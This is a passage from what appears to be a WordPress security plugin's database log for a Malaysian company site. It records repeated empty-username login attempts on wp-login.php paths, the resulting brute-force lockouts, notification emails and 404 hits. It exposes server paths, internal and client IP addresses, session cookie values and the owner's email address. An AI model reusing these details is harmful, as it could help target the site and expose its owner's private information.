Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvF8rjw0hTms86NOnwqHgAAAZM\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.86\";s:11:\"REMOTE_PORT\";s:5:\"52406\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvF8rjw0hTms86NOnwqHgAAAZM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569441267.0492\";s:12:\"REQUEST_TIME\";s:10:\"1569441267\";}}','notice','2019-09-25 19:54:31','2019-09-25 19:54:27',31185744,32703880,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27021,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 03:54:27\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 19:54:27\";s:14:\"lockout_expire\";s:19:\"2019-09-30 07:54:27\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-29 23:54:27\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 19:54:31','2019-09-25 19:54:27',31267104,32703880,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27022,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 19:54:31','2019-09-25 19:54:27',31889768,32703880,'https://bintara.com.my/wordpress/wp-login.php',1,0,'103.6.198.86'),(27023,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=fc8bd944a7135882d894c5daba71049b\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvKqsIxHKnBK@s1FldAIgAAAU0\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.86\";s:11:\"REMOTE_PORT\";s:5:\"50258\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvKqsIxHKnBK@s1FldAIgAAAU0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569442475.0312\";s:12:\"REQUEST_TIME\";s:10:\"1569442475\";}}','notice','2019-09-25 20:14:37','2019-09-25 20:14:35',31178952,32707216,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.86'),(27024,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 04:14:35\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 20:14:35\";s:14:\"lockout_expire\";s:19:\"2019-09-30 08:14:35\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 00:14:35\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 20:14:37','2019-09-25 20:14:35',31260320,32707216,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.86'),(27025,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 20:14:37','2019-09-25 20:14:35',31882920,32707216,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.86'),(27026,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"63374\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvLrbjw0hTms86NOnwwtAAAAZY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569442734.254\";s:12:\"REQUEST_TIME\";s:10:\"1569442734\";}}','notice','2019-09-25 20:18:56','2019-09-25 20:18:54',30820256,32631536,'https://bintara.com.my/?page_id=18',1,0,'136.243.199.108'),(27027,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:152:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.26 Safari/537.36 Core/1.63.5221.400 QQBrowser/10.0.1125.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"163.172.105.148\";s:11:\"REMOTE_PORT\";s:5:\"64051\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvM97jw0hTms86NOnwxhAAAAZg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569443063.5312\";s:12:\"REQUEST_TIME\";s:10:\"1569443063\";}}','notice','2019-09-25 20:24:26','2019-09-25 20:24:23',31214608,33031368,'https://bintara.com.my/?page_id=18',1,0,'163.172.105.148'),(27028,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=e26de7adf690e349f2863b78c884e733\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvN-7jw0hTms86NOnwyFwAAAYg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.6.198.118\";s:11:\"REMOTE_PORT\";s:5:\"58032\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvN-7jw0hTms86NOnwyFwAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569443327.7205\";s:12:\"REQUEST_TIME\";s:10:\"1569443327\";}}','notice','2019-09-25 20:28:50','2019-09-25 20:28:48',31179744,32708248,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.118'),(27029,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 04:28:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 20:28:48\";s:14:\"lockout_expire\";s:19:\"2019-09-30 08:28:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 00:28:48\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 20:28:50','2019-09-25 20:28:48',31261088,32708248,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.118'),(27030,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 20:28:50','2019-09-25 20:28:48',31883672,32708248,'https://bintara.com.my/blog/wp-login.php',1,0,'103.6.198.118'),(27031,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"94\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=aace2437237c19fcf246f444c8c6b074\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvRu8IxHKnBK@s1FldCLQAAAUE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"110.4.45.32\";s:11:\"REMOTE_PORT\";s:5:\"37286\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvRu8IxHKnBK@s1FldCLQAAAUE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569444283.8783\";s:12:\"REQUEST_TIME\";s:10:\"1569444283\";}}','notice','2019-09-25 20:44:45','2019-09-25 20:44:44',31181392,32724472,'https://bintara.com.my/blog/wp-login.php',1,0,'110.4.45.32'),(27032,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 04:44:44\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 20:44:44\";s:14:\"lockout_expire\";s:19:\"2019-09-30 08:44:44\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 00:44:44\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 20:44:45','2019-09-25 20:44:44',31262720,32724472,'https://bintara.com.my/blog/wp-login.php',1,0,'110.4.45.32'),(27033,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-25 20:44:45','2019-09-25 20:44:44',31885328,32724472,'https://bintara.com.my/blog/wp-login.php',1,0,'110.4.45.32'),(27034,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:81:\"wordpress_test_cookie=WP+Cookie+check; icwp-wpsf=d4f5831637a760c03313c1e6fe39bdf2\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYvWq7jw0hTms86NOnw25gAAAYg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"182.239.43.161\";s:11:\"REMOTE_PORT\";s:5:\"38058\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYvWq7jw0hTms86NOnw25gAAAYg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569445547.1418\";s:12:\"REQUEST_TIME\";s:10:\"1569445547\";}}','notice','2019-09-25 21:05:49','2019-09-25 21:05:47',31184288,32719568,'https://bintara.com.my/wp/wp-login.php',1,0,'182.239.43.161'),(27035,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-26 05:05:47\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-25 21:05:47\";s:14:\"lockout_expire\";s:19:\"2019-09-30 09:05:47\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-30 01:05:47\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-25 21:05:49','2019-09-25 